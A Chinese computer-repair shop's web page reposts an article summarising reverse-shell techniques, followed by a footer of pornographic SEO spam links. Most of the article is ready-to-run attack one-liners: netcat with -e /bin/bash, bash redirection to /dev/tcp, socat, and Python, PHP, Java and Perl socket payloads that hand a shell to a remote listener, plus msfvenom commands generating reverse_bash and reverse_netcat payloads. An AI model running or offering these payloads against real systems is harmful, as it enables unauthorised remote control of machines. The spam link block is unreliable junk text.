錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
反彈shell命令總結

作者: 佚名  日期:2023-07-13 17:19:21   來源: 本站整理

反彈shell命令總結

1.nc反彈

開啟本地8080端口監聽,并將本地的bash發布出去。
root# nc -lvvp 8080 -t -e /bin/bash
在這里插入圖片描述

連接目標主機
nc ip 端口
在這里插入圖片描述

2.bash直接反彈

kali監聽
在這里插入圖片描述
靶機運行:
root# bash -i >& /dev/tcp/ip/端口 0>&1
在這里插入圖片描述
bash命令解析:
在這里插入圖片描述
反彈成功
在這里插入圖片描述

3. socat反彈

kali監聽:socat tcp-listen:1234 -
在這里插入圖片描述
靶機運行:
socat exec:‘bash -li’,pty,stderr,setsid,sigint,sane tcp:IP:1234
在這里插入圖片描述
反彈成功
在這里插入圖片描述

4.腳本反彈

4.1:python反彈

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect(("IP",Port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

4.2:php反彈

php -r '$sock=fsockopen("IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");' 

4.3:java反彈

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP/port;cat <&5 |

while read line; do $line 2>&5 >&5; done"] as String[]) p.waitFor() 

4.4:perl反彈

perl -e 'use Socket;$i="IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));

if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 

.msf獲取反彈一句話

可以直接使用 msfvenom -l 結合關鍵字過濾(如cmd/unix/reverse),找出需要的各類反彈一句話payload的路徑信息。

# msfvenom -l payloads 'cmd/unix/reverse' 

發現msf支持反彈shell類型豐富。可以根據需求選擇。

在這里插入圖片描述
例如:生成bash的

# root@kali:~# msfvenom -p cmd/unix/reverse_bash lhost=1.1.1.1 lport=6666 R 

將生成的payload粘貼,在靶機運行即可。
在這里插入圖片描述
生成netcat

msfvenom -p cmd/unix/reverse_netcat lhost=1.1.1.1 lport=12345 R 

將生成的payload粘貼,在靶機運行即可。
在這里插入圖片描述
靶機運行payload:
在這里插入圖片描述
成功反彈
在這里插入圖片描述



熱門文章
  • L1正則化和L2正則化
  • 在Linux系統下,可以使用以下方法和...
  • 主板型號怎么看?小編將給大家介紹...
  • win10在激活界面會提示無法訪問激活...
  • 360日歷怎么卸載?360日歷怎么徹底...
  • 墨魚丸是什么怎么卸載?墨魚丸視頻...
  • Win10打開壓縮文件提示安全警告的解...
  • Linux高頻常用指令匯總
  • 150個CMD命令(史上更全cmd命令 net...
  • 線性回歸算法
  • HTTPS和HTTP的主要區別
  • Oracle 炮轟、Ubuntu 看戲,紅帽被...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 亚洲性无码AV中文字幕| 少妇人妻偷人精品无码视频新浪| 国产成人无码一区二区三区| 久久精品无码一区二区app| 亚洲熟妇无码AV在线播放| 少妇精品无码一区二区三区| 无码人妻啪啪一区二区| 中文字幕丰满乱子伦无码专区| 一本大道无码av天堂| 中文字幕无码第1页| 无码人妻啪啪一区二区| 亚洲AV色吊丝无码| 亚洲VA中文字幕无码一二三区| 亚洲国产成人精品无码区二本| 国产成人无码AV一区二区| 无码中文在线二区免费| 人妻丰满熟妇AV无码区乱| 亚洲伊人成无码综合网| 亚洲精品久久无码av片俺去也| 熟妇人妻无码中文字幕| 中文成人无码精品久久久不卡 | 无码人妻少妇久久中文字幕| 亚洲精品色午夜无码专区日韩| 久久亚洲中文字幕无码| 欧洲黑大粗无码免费| 无码福利一区二区三区| 久久久久亚洲AV无码麻豆| 国产午夜无码视频在线观看| 精品无码国产污污污免费网站国产| 无码成人精品区在线观看| 日韩精品久久无码中文字幕| 国产精品无码永久免费888| 国产精品白浆无码流出| 无码丰满熟妇一区二区| 亚洲Av永久无码精品黑人| 精品久久亚洲中文无码| 亚洲a∨无码精品色午夜| 好了av第四综合无码久久| 性虎精品无码AV导航| 特级无码a级毛片特黄| 曰韩无码AV片免费播放不卡|